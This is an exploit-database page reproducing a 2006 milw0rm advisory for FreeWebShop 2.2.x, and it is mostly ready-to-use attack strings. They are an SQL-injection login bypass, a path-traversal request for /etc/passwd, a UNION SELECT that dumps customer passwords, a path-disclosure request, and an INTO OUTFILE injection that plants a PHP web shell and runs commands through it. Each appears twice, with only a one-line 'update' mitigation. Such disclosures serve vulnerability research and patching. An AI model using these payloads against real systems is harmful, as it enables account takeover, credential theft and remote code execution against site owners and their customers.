header-logo
Suggest Exploit
vendor:
www.freewebshop.org
by:
Spiked and anonymous
9
CVSS
CRITICAL
Bypass Login, Read Files, List Passwords, Path Disclosure and Create Files
N/A
CWE
Product Name: www.freewebshop.org
Affected Version From: 2.2.x
Affected Version To: 2.2.x
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Bypass Login, Read Files, List Passwords, Path Disclosure and Create Files Vulnerability in www.freewebshop.org

Bypass Login: username:admin password:' or 'a'='a Read Files: /index.php?page=info&action=../../../../../../../../../../../../etc/passwd%00 List Passwords: /index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,loginname,5,6,7,8%20FROM%20customer Path Disclosure: /index.php?page=info&action=../../1337inexistant Create Files (needs Path Disclosure): /index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'/langs/uk/fork.php?cmd=ls

Mitigation:

Update to the latest version of www.freewebshop.org
Source

Exploit-DB raw data:

Product: www.freewebshop.org
Version: 2.2.x, maybe lower
Critical Lvl : Highly critical
Where : From Remote
Exploits:

Bypass Login:
username:admin
password:' or 'a'='a

Read Files:
/index.php?page=info&action=../../../../../../../../../../../../etc/passwd%00

List Passwords:
/index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,loginname,5,6,7,8%20FROM%20customer

Path Disclosure:
/index.php?page=info&action=../../1337inexistant

Create Files (needs Path Disclosure):
/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'
/langs/uk/fork.php?cmd=ls


Discovered by Spiked and anonymous.
irc.geekshangout.org #backup 

# milw0rm.com [2006-11-02]

Navigation

Suggest Exploit

Services By CQR